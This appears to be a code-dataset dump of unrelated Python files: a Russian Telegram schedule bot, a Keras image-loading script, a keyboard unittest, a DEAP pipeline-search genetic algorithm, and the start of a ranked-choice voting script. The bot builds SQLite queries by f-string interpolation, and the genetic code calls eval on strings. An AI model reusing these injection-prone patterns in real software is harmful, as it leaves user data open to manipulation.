воскресенье')\n else:\n try:\n para_num = 1\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM users WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n stud = pd.read_excel(f'stud_{today.strftime(\"%d\")}.{today.strftime(\"%m\")}.{today.year}.xlsx')\n s1 =(stud[f'{[list(result[0])[1]][0]}'].tolist())\n group_num = [list(result[0])[1]][0]\n skip = ''\n text = ''\n while cikl1 < key1:\n skip = str(s1[cikl1])\n if (skip == 'nan'):\n text = f'{text}\\n\\n{para_num} пара:\\n -'\n cikl1 = cikl1 + 1\n para_num = para_num + 1\n else:\n text = f'{text}\\n\\n{para_num} пара:\\n {s1[cikl1]}'\n cikl1 = cikl1 + 1\n para_num = para_num + 1\n await message.answer(text)\n try:\n i = '1'\n conn = sqlite3.connect('zamen_next.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE groups LIKE \"%{group_num}%\"')\n res1 = cur.fetchall()\n b1 = \" \"\n first_lession = ''\n num_para = ''\n schet = 0\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n conn = sqlite3.connect('zamen_next1.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE groups LIKE \"%{group_num}%\"')\n res1 = cur.fetchall()\n schet = 0\n num_para = ''\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n except Exception as ext:\n print(ext)\n await message.answer(f'{first_lession}{b1}')\n\n except Exception:\n try:\n para_num = 1\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM prepods WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n stud = pd.read_excel(f'prep_{today.strftime(\"%d\")}.{today.strftime(\"%m\")}.{today.year}.xlsx')\n s1 =(stud[f'{[list(result[0])[1]][0]}'].tolist())\n prepodavat = [list(result[0])[1]][0]\n skip = ''\n text = ''\n while cikl1 < key1:\n skip = str(s1[cikl1])\n if (skip == 'nan'):\n text = f'{text}\\n\\n{para_num} пара:\\n -'\n cikl1 = cikl1 + 1\n para_num = para_num + 1 \n else:\n text = f'{text}\\n\\n{para_num} пара:\\n {s1[cikl1]}'\n cikl1 = cikl1 + 1\n para_num = para_num + 1\n await message.answer(text)\n try:\n i = '1'\n num_para = ''\n first_lession = ''\n conn = sqlite3.connect('zamen_next.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE para_zam LIKE \"%{prepodavat}%\"')\n res1 = cur.fetchall()\n b1 = \" \"\n schet = 0\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + 
f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n conn = sqlite3.connect('zamen_next1.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE para_zam LIKE \"%{prepodavat}%\"')\n res1 = cur.fetchall()\n schet = 0\n num_para = ''\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n except Exception as ext:\n print(f'Bad zamen today prepodavat\\n{ext}')\n await message.answer(f'{first_lession}{b1}')\n except Exception as ext:\n await message.answer('Если вы не получили расписание проверьте профиль')\n\n\n@dp.message_handler(text=['Перейти в главное меню', 'Вернутся в главное меню', f'{emoji.emojize(\":arrow_left:\", use_aliases=True)}Назад', 'Назад'])\nasync def main_menu (message: types.Message):\n global x\n if x == 0:\n sost = f\"Выкл{emoji.emojize(':ballot_box_with_check:', use_aliases=True)}\"\n if x == 1:\n sost = f\"Вкл{emoji.emojize(':white_check_mark:', use_aliases=True)}\"\n await bot.send_message(message.from_user.id, \n f'Добро пожаловать в главное меню.\\nЗдесь вы можете настроить уведомления\\nА также получить расписание вручную\\n\\nСостояние уведомлений: {sost}\\n\\n{emoji.emojize(\":exclamation:\", use_aliases=True)}ЧТОБЫ ПОЛУЧАТЬ РАСПИСАНИЕ НА ПРЕПОДАВАТЕЛЯ У ВАС НЕ ДОЛЖЕН БЫТЬ УСТАНОВЛЕН НОМЕР ГРУППЫ{emoji.emojize(\":exclamation:\", use_aliases=True)}', \n reply_markup=keyboard.button_main,\n )\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":briefcase:\", use_aliases=True)}Мой профиль'])\nasync def get_profile(message: types.Message):\n await message.answer('Какой профиль вам нужен?', reply_markup=keyboard.button_stpr)\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":school_satchel:\", use_aliases=True)}Студент'])\nasync def student (message: types.Message):\n try:\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM users WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n await bot.send_message(message.from_user.id, f'Студент:\\nID = {list(result[0])[0]}\\nGroup = {[list(result[0])[1]][0]}\\nTime = {[list(result[0])[2]][0]}')\n except Exception:\n await message.answer('Пользователь не найден, пожалуйста пройдите регистрацию снова написав:\\n/start')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":mortar_board:\", use_aliases=True)}Преподаватель'])\nasync def profile1 (message:types.Message):\n try:\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM prepods WHERE user_id = \"{message.from_user.id}\"')\n result1 = cur.fetchall()\n await bot.send_message(message.from_user.id, f'Преподаватель:\\nID = {list(result1[0])[0]}\\nФИО = {[list(result1[0])[1]][0]}\\nTime = {[list(result1[0])[2]][0]}')\n except Exception:\n await message.answer('Пользователь не найден, пожалуйста пройдите регистрацию снова написав:\\n/start')\n\n\n@dp.message_handler(text=f'{emoji.emojize(\":email:\", use_aliases=True)}Помощь')\nasync def user_help (message: types.Message):\n photo = 
['https://sun9-45.userapi.com/impg/L_ZjDqZoxr0-Ps0fQi0-c48PjJ-UWJk64exZqw/HrcqjPtfIjE.jpg?size=840x737&quality=96&sign=e78ad3ba428e817729e80c0f02d249df&type=album', \n 'https://sun9-30.userapi.com/impg/S-bSLtCaDlC1bcUwMCDlCAyzerrNVqFgw5Ygpg/BoLXpwQ1HcY.jpg?size=608x770&quality=96&sign=e101f67bcaa95f1aec2d52a651d24cef&type=album', \n 'https://sun9-64.userapi.com/impg/v9TI88OR_8UV_CJ2u2FRJlSjFiRhpoh_lFKSFg/jPCHxw5V4WQ.jpg?size=1125x1077&quality=96&sign=b62f3c74fd48e7831d66add4eb792715&type=album',\n ]\n await bot.send_photo(message.from_user.id, photo[random.randint(0,2)])\n await message.answer('Отправить сообщение разработчикам:\\n /msgtadm\\nПройти регистрацию с самого начала: \\n /start\\n\\n©Author', reply_markup = keyboard.btn_back)\n \n#dop commands\n@dp.message_handler(commands=['msgtadm'])\nasync def msgtoadmins(message: types.Message):\n await message.answer('Укажите в настройках ник телеграм, чтобы мы смогли вам ответить)\\nВаше сообщение:')\n await States.sndmsg.set()\n\n\n@dp.message_handler(state=States.sndmsg)\nasync def msgtoadminist(message: types.Message, state= FSMContext):\n try:\n async with state.proxy() as msg:\n msg['bef'] = message.text\n bef = md.text(md.text(md.bold(msg['bef'])))\n reworkbef = markdown(bef)\n tgo = ''.join(BeautifulSoup(reworkbef).findAll(text=True))\n await bot.send_message(admin_id, f'{message.from_user.username}\\nНаписал:\\n{tgo}')\n await bot.send_message(admin2_id, f'{message.from_user.username}\\nНаписал:\\n{tgo}')\n await state.finish()\n except Exception as ext:\n print(ext)\n await message.answer('Сообщение не доставлено одному из администраторов но вам в скором времени ответят')\n await state.finish()\n\n\n@dp.message_handler(text=f'{emoji.emojize(\":exclamation:\", use_aliases=True)}Внимание')\nasync def waern (message: types.Message):\n await started()\n global message_for_see\n await message.answer(message_for_see, reply_markup=keyboard.btn_back)\n\n\n@dp.message_handler(text=\"Изменения\")\nasync def changes (message: types.Message):\n sender = InputFile('/home/author/horde/table.txt', 'zameni_today.txt')\n await bot.send_document(message.from_user.id, sender)\n\n#####################\n##Админские функции##\n#####################\n@dp.message_handler(commands=['adm1_set'])\nasync def Adm1_set(message: types.message, state=FSMContext):\n await States.adm1_set.set()\n await message.answer('Message for user:')\n\n\n@dp.message_handler(state=States.adm1_set)\nasync def Adm1_setting(message: types.message, state=FSMContext):\n try:\n if admin_id == f'{message.from_user.id}' or admin2_id == f'{message.from_user.id}':\n async with state.proxy() as usr:\n global reworks\n usr['bef'] = message.text\n bef = md.text(md.text(md.bold(usr['bef'])))\n reworkbef = markdown(bef)\n reworks = ''.join(BeautifulSoup(reworkbef).findAll(text=True))\n await bot.send_message(message.from_user.id, reworks)\n await state.finish()\n else:\n await message.answer('This command admin only') \n except Exception as ext:\n print(f'Bad1\\n{ext}')\n\n\n@dp.message_handler(commands=['adm1'])\nasync def Adm1(message: types.message, state=FSMContext):\n await States.adm1.set()\n await message.answer('user_id:')\n \n\n@dp.message_handler(state=States.adm1)\nasync def Adm1_st(message: types.message, state=FSMContext):\n try:\n if admin_id == f'{message.from_user.id}' or admin2_id == f'{message.from_user.id}':\n async with state.proxy() as usr:\n global reworks\n usr['us_id'] = message.text\n bef = md.text(md.text(md.bold(usr['us_id'])))\n rew = markdown(bef)\n rework1 = 
''.join(BeautifulSoup(rew).findAll(text=True))\n await bot.send_message(rework1,reworks)\n await state.finish()\n else:\n await message.answer('This command admin only') \n except Exception as ext:\n print (f\"bad\\n{ext}\")\n\n\n@dp.message_handler(commands=['start_f'])\nasync def start_f (message: types.Message):\n while True:\n await search()\n await asyncio.sleep(300)\n await buti()\n await asyncio.sleep(3600)\n \n\n@dp.message_handler(commands=['adm_usr_list'])\nasync def userlist (message: types.Message):\n if admin_id == f'{message.from_user.id}' or admin2_id == f'{message.from_user.id}':\n await bot.send_document(message.from_user.id, dbfile)\n else:\n await message.answer('Admins only') \n\n#@dp.message_handler(commands=['usr_notify'])\n#async def userlist (message: types.Message):\n# try:\n# conn = sqlite3.connect('users_database.db')\n# cur = conn.cursor()\n# cur.execute(f'SELECT * FROM users WHERE user_id')\n# res = cur.fetchall\n# for str in res:\n# try:\n# cur.execute(f'SELECT {str} FROM users WHERE user_id')\n# result = cur.fetchone\n# await bot.send_message(result, '1')\n# except Exception as ext:\n# print(ext) \n# except Exception as ext:\n# print(f'Bad all notify\\n{ext}')\n#\n\n####################################\n##Расписание уведомлений и запуска##\n####################################\nasync def scheduler(message: types.Message, time):\n global x\n try:\n aioschedule.every().day.at(time).do(schedule_next_day, message)\n while x == 1:\n await aioschedule.run_pending()\n await asyncio.sleep(1)\n except Exception as ext:\n print (f'Trouble with schedule\\n{ext}')\n\nasync def scheduler_td(message: types.Message, time):\n global x\n try:\n aioschedule.every().day.at(time).do(schedule_today, message)\n while x == 1:\n await aioschedule.run_pending()\n await asyncio.sleep(1)\n except Exception as ext:\n print (f'Trouble with schedule\\n{ext}')\n\n\n@dp.message_handler(commands=['test'])\nasync def test(message:types.Message):\n print(\"test\")\n\n###############\n##Сабпроцессы##\n###############\nasync def search():\n subprocess.Popen(['python3', 'take_resp.py'])\n\nasync def buti():\n subprocess.Popen(['python3', 'butify.py'])\n\n\nif __name__=='__main__':\n executor.start_polling(dp, skip_updates=True)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":38189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"344172017","text":"import numpy as np\nimport os\nimport time\nfrom resnet50 import ResNet50\nfrom keras.preprocessing import image\nfrom keras.layers import GlobalAveragePooling2D, Dense, Dropout,Activation,Flatten\n\nfrom imagenet_utils import preprocess_input\nfrom keras.layers import Input\nfrom keras.models import Model\nfrom keras.utils import np_utils\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split\nprint(\"done\")\n#%%\nimg_path = 'elephant.jpg'\nimg = image.load_img(img_path, target_size=(224, 224))\nx = image.img_to_array(img)\nprint(x.shape)\nx = np.expand_dims(x, axis=0)\nprint(x.shape)\nx = preprocess_input(x)\nprint('Input image shape:', x.shape)\n\n# Loading the training data\nPATH = os.getcwd()\n# Define data path\ndata_path = PATH + '/data'\ndata_dir_list = os.listdir(data_path)\n\nimg_data_list = []\n\nfor dataset in data_dir_list:\n\timg_list = os.listdir(data_path+'/' + dataset)\n\tprint('Loaded the images of dataset-'+'{}\\n'.format(dataset))\n\tfor img in 
img_list:\n\t\timg_path = data_path + '/' + dataset + '/' + img\n\t\timg = image.load_img(img_path, target_size=(224, 224))\n\t\tx = image.img_to_array(img)\n\t\tx = np.expand_dims(x, axis=0)\n\t\tx = preprocess_input(x)\n\t\tprint('Input image shape:', x.shape)\n\t\timg_data_list.append(x)\n\nimg_data = np.array(img_data_list)\n#img_data = img_data.astype('float32')\nprint(img_data.shape)\nimg_data = np.rollaxis(img_data, 1, 0)\nprint(img_data.shape)\nimg_data = img_data[0]\nprint(img_data.shape)\n\n\n# Define the number of classes\nnum_classes = 4\nnum_of_samples = img_data.shape[0]\nlabels = np.ones((num_of_samples,), dtype='int64')\n\nlabels[0:202] = 0\nlabels[202:404] = 1\nlabels[404:606] = 2\nlabels[606:] = 3\n\n\n","sub_path":"jupyther_code.py","file_name":"jupyther_code.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"289697208","text":"from Keyboard import Listener, Button\n# from pynput.keyboard import Key, Controller\nfrom pynput.keyboard import Key, Controller as KeyboardController\nimport unittest\nimport os\nfrom unittest import TestCase\nfrom unittest.mock import patch\n\nget_input = ''\ndef mock_input(topics,cmd,default = None):\n global get_input\n get_input = '{topics}: {CMD} received'.format(topics = str(topics), CMD = str(cmd))\nF_Button = Button('f',{'topics':'console','on_cmd':'Hello World','off_cmd':'Fuck World','args':[]},callback=mock_input,button_type='trigger')\nbuttons = [F_Button]\n\nclass KeyboardTestCase(TestCase):\n\n # get_input will bind to callback during this test\n def test_Button(self):\n global get_input, buttons\n listener = Listener(buttons)\n listener.start()\n os.system(\"stty -echo\")\n keyboard = KeyboardController()\n keyboard.press('f')\n # with self.assertRaises(Exception):\n expected_input = '{topics}: {CMD} received'.format(topics = str('console'), CMD = str('Hello World'))\n self.assertEqual(get_input,\n expected_input,'Keyboard test failed : expected value {0} actual value {1}'.format(get_input, expected_input))\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"Keyboard_test.py","file_name":"Keyboard_test.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21228020","text":"from deap import creator, base, tools, gp\nimport random\nimport numpy as np\nimport pandas as pd\nfrom construction_pipeline.models import preprocessing_models, selection_models, classification_models\nfrom copy import deepcopy,copy\n# from sklearn import preprocessing\n# from sklearn import feature_selection\nimport sklearn\n# from sklearn import ensemble\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.model_selection import cross_val_score, train_test_split\nfrom inspect import types\nfrom sklearn.model_selection import GridSearchCV\nfrom time import time\n\ndef random_value_from(obj, name):\n if isinstance(getattr(obj, name), np.ndarray):\n return random.choice(getattr(obj, name))\n else:\n return getattr(obj, name)\n\nclass GeneticBase(object):\n def __init__(self, generations=100, population_size=100, offspring_size=None):\n self.generations = generations\n self.population_size = population_size\n self.offspring_size = offspring_size\n self.base_primitives = None\n self.max_height = 3\n self.min_height = 1\n self.probability_mutation = 0.7\n self.probability_mate = 0.3\n self.__population = []\n self.control_pop = []\n\n def 
create_base_primitives_and_terminals(self):\n if self.base_primitives is None:\n self._base_primitives = []\n for model_name, model_args in preprocessing_models.items():\n model_args = deepcopy(model_args)\n # model_args['random_value_from'] = random_value_from\n model_args['type_model'] = 'preprocessing'\n model_args['name_model'] = model_name\n self._base_primitives.append(type(model_name, (), model_args))\n for model_name, model_args in selection_models.items() :\n model_args = deepcopy(model_args)\n # model_args['random_value_from'] = random_value_from\n model_args['type_model'] = 'selection'\n model_args['name_model'] = model_name\n self._base_primitives.append(type(model_name, (), model_args))\n self._base_terminals = []\n for model_name, model_args in classification_models.items() :\n model_args = deepcopy(model_args)\n # model_args['random_value_from'] = random_value_from\n model_args['type_model'] = 'classification'\n model_args['name_model'] = model_name\n self._base_terminals.append(type(model_name, (), model_args))\n\n\n\n\n\n def _setup_toolbox(self):\n creator.create('FitnessMulti', base.Fitness, weights=(-1.0, 1.0))\n creator.create('Individual', list, fitness=creator.FitnessMulti, info=tuple)\n\n self._toolbox = base.Toolbox()\n self._toolbox.register('expression', self._grow_tree)\n self._toolbox.register('individual', tools.initIterate, creator.Individual, self._toolbox.expression)\n self._toolbox.register('population', tools.initRepeat, list, self._toolbox.individual, n = self.population_size)\n self._toolbox.register('evaluation', self._evaluation_individuals)\n self._toolbox.register('select', tools.selNSGA2)\n self._toolbox.register('mate', self._mate_operator)\n self._toolbox.register('mutate', self._mutate_operator)\n # self._toolbox.register('compilation', self.expression_to_sklearn)\n\n\n def _grow_tree(self):\n add = False\n CALLABLES = (types.FunctionType, types.MethodType)\n while not add:\n expression = []\n height = random.randint(self.min_height, self.max_height)\n for i in range(1,height):\n primitive_obj = random.choice(self._base_primitives)()\n for key in [i for i in dir(primitive_obj) if not i.startswith('__') and not isinstance(getattr(primitive_obj,i), CALLABLES)]:\n setattr(primitive_obj, key, random_value_from(primitive_obj, key))\n expression.append((i, primitive_obj))\n terminal_obj = random.choice(self._base_terminals)()\n for key in [i for i in dir(terminal_obj) if not i.startswith('__') and not isinstance(getattr(terminal_obj,i), CALLABLES)]:\n t = random_value_from(terminal_obj, key)\n setattr(terminal_obj, key, t)\n expression.append((height, terminal_obj))\n count = 0\n for ind in self.control_pop:\n if self.compare_inds(ind,expression):\n count += 1\n if count <= 3:\n add = True\n self.control_pop.append(expression)\n return expression\n\n def model_to_sklearn(self, model, with_param=True):\n if with_param:\n m = model\n t = model.__dict__\n kwargs = copy(t)\n kwargs.pop('type_model')\n kwargs.pop('name_model')\n return eval(model.name_model+'(**kwargs)')\n else:\n return eval(model.name_model+'()')\n\n def individual_to_pipeline(self, ind):\n pipeline = make_pipeline(*[self.model_to_sklearn(model[1]) for model in ind])\n return pipeline\n\n def _evaluation_individuals(self, population, pipeline_list):\n for i, pipeline in enumerate(pipeline_list):\n cross_val = cross_val_score(pipeline[1], self.features, self.targets, cv=5)\n population[i].fitness.values = (len(population[i]),cross_val.mean())\n # print(pipeline[0], cross_val.mean(), 
sep='\\n')\n\n def _mate_operator(self, ind1, ind2):\n common_models = []\n for model_ind1 in ind1:\n for model_ind2 in ind2:\n if isinstance(model_ind1[1], type(model_ind2[1])):\n common_models.append((model_ind1, model_ind2))\n model = random.choice(common_models)\n if model[0][1].type_model != 'classification':\n param = random.choice(list(model[0][1].__dict__.keys()))\n new_ind = deepcopy(ind1)\n setattr(new_ind[model[0][0]-1][1], param, getattr(ind2[model[1][0]-1][1],param))\n return new_ind\n param_model1 = model[0][1].__dict__\n param_model2 = model[1][1].__dict__\n param_grid = {}\n for key in param_model1.keys():\n if param_model1[key] == param_model2[key]:\n param_grid[key] = [param_model1[key]]\n else:\n param_grid[key] = [param_model1[key], param_model2[key]]\n param_grid = deepcopy(param_grid)\n if len(param_grid) == 2:\n return ind1\n else:\n param_grid.pop('type_model')\n param_grid.pop('name_model')\n t = GridSearchCV(self.model_to_sklearn(model[0][1],False), param_grid, cv=5,scoring=\"accuracy\").fit(self.features, self.targets)\n new_params = t.best_params_\n new_params['type_model'] = model[0][1].type_model\n new_params['name_model'] = model[0][1].name_model\n # new_model = (model[0][0],type(model[0][1].name_model,(),new_params))\n new_ind = deepcopy(ind1)\n new_ind[model[0][0]-1][1].__dict__ = new_params\n return new_ind\n\n\n\n\n def _mutate_operator(self, ind):\n if np.random.random() <= 1/3:\n new_ind = self.replacement_mutation(ind)\n self.add_info(new_ind)\n elif np.random.random() <= 2/3:\n new_ind = self.shrink_mutation(ind)\n self.add_info(new_ind)\n else:\n new_ind = self.insert_mutation(ind)\n self.add_info(new_ind)\n return new_ind\n\n def shrink_mutation(self, ind):\n if len(ind) > 1:\n del_model = random.choice(ind[:-1])\n for i in range(del_model[0],len(ind)):\n ind[i] = (ind[i][0]-1,ind[i][1])\n ind.pop(del_model[0]-1)\n return ind\n\n def insert_mutation(self, ind):\n CALLABLES = (types.FunctionType, types.MethodType)\n if len(ind) < self.max_height:\n primitive_obj = random.choice(self._base_primitives)()\n for key in [i for i in dir(primitive_obj) if\n not i.startswith('__') and not isinstance(getattr(primitive_obj, i), CALLABLES)] :\n setattr(primitive_obj, key, random_value_from(primitive_obj, key))\n ind.insert(len(ind)-1,(len(ind), primitive_obj))\n ind[-1] = (ind[-1][0]+1,ind[-1][1])\n return ind\n\n def replacement_mutation(self, ind):\n ind_copy = deepcopy(ind)\n model = random.choice(ind_copy)\n if model[0] < len(ind) and np.random.random() <= 0.5:\n CALLABLES = (types.FunctionType, types.MethodType)\n primitive_obj = random.choice(self._base_primitives)()\n for key in [i for i in dir(primitive_obj) if\n not i.startswith('__') and not isinstance(getattr(primitive_obj, i), CALLABLES)] :\n setattr(primitive_obj, key, random_value_from(primitive_obj, key))\n ind_copy[model[0]-1] = (model[0], primitive_obj)\n else:\n params = deepcopy(model[1].__dict__)\n params.pop('type_model')\n params.pop('name_model')\n if params != {}:\n param = random.choice(list(params.keys()))\n if model[0] == len(ind_copy):\n k = random.choice(classification_models[model[1].name_model][param])\n else:\n if model[1].type_model == 'selection':\n k = random.choice(selection_models[model[1].name_model][param])\n elif model[1].type_model == 'preprocessing':\n k = random.choice(preprocessing_models[model[1].name_model][param])\n setattr(model[1], param, k)\n return ind_copy\n\n\n\n\n\n\n def add_info(self, ind):\n names = []\n for model in ind:\n 
names.append(model[1].name_model)\n ind.info = tuple(names)\n\n def get_random_two_ind_for_mate(self, population):\n favorable_inds = []\n for i in range(len(population)):\n for j in range(i+1,len(population)):\n a = set(population[i].info)\n b = set(population[j].info)\n if a.intersection(b) != set():\n favorable_inds.append((population[i], population[j]))\n random_inds = random.choice(favorable_inds)\n return deepcopy(random_inds)\n\n def changes(self):\n population_copy = deepcopy(self.__population)\n offspring = []\n time_table = []\n i = 0\n while i < self.population_size:\n begin_change = time()\n if np.random.random() < self.probability_mate:\n type_change = 'mate'\n new_ind = self._toolbox.mate(*self.get_random_two_ind_for_mate(population_copy))\n elif np.random.random() <= self.probability_mate + self.probability_mutation:\n type_change = 'mutate'\n new_ind = self._toolbox.mutate(random.choice(population_copy))\n stop_change = time() - begin_change\n begin_check = time()\n count = 0\n for ind in offspring:\n if self.compare_inds(ind, new_ind):\n count += 1\n for ind in self.__population :\n if self.compare_inds(ind, new_ind) :\n count += 1\n stop_check = time() - begin_check\n if count < 5 :\n time_table.append([i,type_change,stop_change,stop_check])\n offspring.append(new_ind)\n i += 1\n return offspring\n\n def compare_inds(self, ind1, ind2):\n if len(ind1) != len(ind2):\n return False\n for i in range(len(ind1)):\n if not isinstance(ind1[i][1], type(ind2[i][1])):\n return False\n return True\n\n\n\n def _pre_init_fit(self):\n self.__population = []\n self.create_base_primitives_and_terminals()\n self._setup_toolbox()\n self.__population = self._toolbox.population()\n\n def fit(self, features, targets):\n self.features = features\n self.targets = targets\n self.base_pop = []\n self._pre_init_fit()\n for ind in self.__population:\n self.add_info(ind)\n for _ in range(self.generations):\n print([_]*200)\n self.pipeline_list = [(individual, self.individual_to_pipeline(individual)) for individual in\n self.__population]\n print('Началась оценка')\n s = time()\n self._evaluation_individuals(self.__population, self.pipeline_list)\n print('Произошла оценка ',time()-s)\n if _ == 3:\n self.old_pop = deepcopy(self.__population)\n s = time()\n offspring = self.changes()\n print('Потомки созданы ',time()-s)\n # for ind in self.__population:\n # print('pop',ind)\n # for ind in offspring:\n # print('off', ind)\n self.pipeline_list = [(individual, self.individual_to_pipeline(individual)) for individual in\n offspring]\n print('Началась оценка')\n s = time()\n self._evaluation_individuals(offspring, self.pipeline_list)\n print('Произошла оценка ',time()-s)\n self.base_pop.append((deepcopy(self.__population),deepcopy(offspring)))\n self.__population[:] = self._toolbox.select(self.__population+offspring,30)\n\n\n\n\n # self.__population[:] = self._toolbox.select(self.__population,5)\n # self._mate_operator(*self.get_random_two_ind_for_mate())\n return self.__population\n\nclass GeneticClassification(GeneticBase):\n def __init__(self, generations=100, population_size=100, offspring_size=None):\n super().__init__(generations,population_size, offspring_size)\n self.type = 'Classification'\n\n\n\n\nif __name__ == '__main__' :\n df = pd.read_csv('../datasets/sonar.csv')\n # df = df.drop(df.index[150 :])\n x_train, x_test, y_train, y_test = train_test_split(df.drop(df.columns[-1], 1), df[df.columns[-1]], test_size=.2,\n random_state=42)\n print(df)\n GB = GeneticBase(population_size=30,generations=5)\n 
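# Note: creator.create('FitnessMulti', base.Fitness, weights=(-1.0, 1.0)) makes every pipeline a\n    # two-objective individual for the NSGA2 selection used in fit(): the first weight minimizes\n    # pipeline length, the second maximizes mean 5-fold cross-validation accuracy, so e.g. a\n    # fitness of (2, 0.93) dominates (3, 0.90) on both axes.\n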
    GB.fit(x_train,y_train)","sub_path":"construction_pipeline/genetic_algorithm_v1.py","file_name":"genetic_algorithm_v1.py","file_ext":"py","file_size_in_byte":14420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"399835747","text":"'''\nCreated on Oct 1, 2013\n\n@author: zhijing\n'''\n\ndef read_voter_preferences(voter_file):\n    '''Takes the file and returns a dictionary where the keys are the voters and the values\n    are lists of the voters' preferred candidates'''\n    voter_dict = dict()\n    for line in voter_file:\n        voter = line.split(';')[0]\n        votes = line.strip().split(';')[1:]\n        voter_dict[voter] = votes\n    voter_file.close()\n    return voter_dict\n\ndef print_dict(title, dictionary, function = None, b=False):\n    '''Prints a dictionary, sorting its items with the given key function (descending when b is True)'''\n    items_to_print_list = sorted(dictionary.items(), key = function, reverse = b)\n    print(title)\n    for i in items_to_print_list:\n        print('  {} -> {}'.format(i[0], i[1]))\n\n\ndef evaluate_ballot(vote_dict:dict, remaining_candidates:set):\n    '''Evaluates the ballots and returns a dictionary mapping each remaining candidate to the\n    number of ballots on which it is the highest-ranked remaining choice'''\n    result_dict = {candidate : 0 for candidate in remaining_candidates}\n    for voter in vote_dict:\n        ballot_number = 0\n        while True:\n            if vote_dict[voter][ballot_number] in remaining_candidates:\n                result_dict[vote_dict[voter][ballot_number]] += 1\n                break\n            else:\n                ballot_number += 1\n    return result_dict\n\n\ndef remaining_candidates(candidate_votes_dict):\n    '''Takes a dictionary of the votes each candidate received and returns the set of\n    candidates that did not tie for the fewest votes'''\n    least_votes = min(candidate_votes_dict.values())\n    remaining_candidates = set(candidate for candidate in candidate_votes_dict if candidate_votes_dict[candidate] != least_votes)\n    return remaining_candidates\n\nif __name__ == '__main__':\n    while True:\n        voter_file_name = input('Enter file with voter preferences:')\n        #Try to make a dictionary out of the voter file\n        try:\n            vote_dict = read_voter_preferences(open(voter_file_name))\n        #If the file name makes read_voter_preferences crash\n        except:\n            print('Not a valid file. 
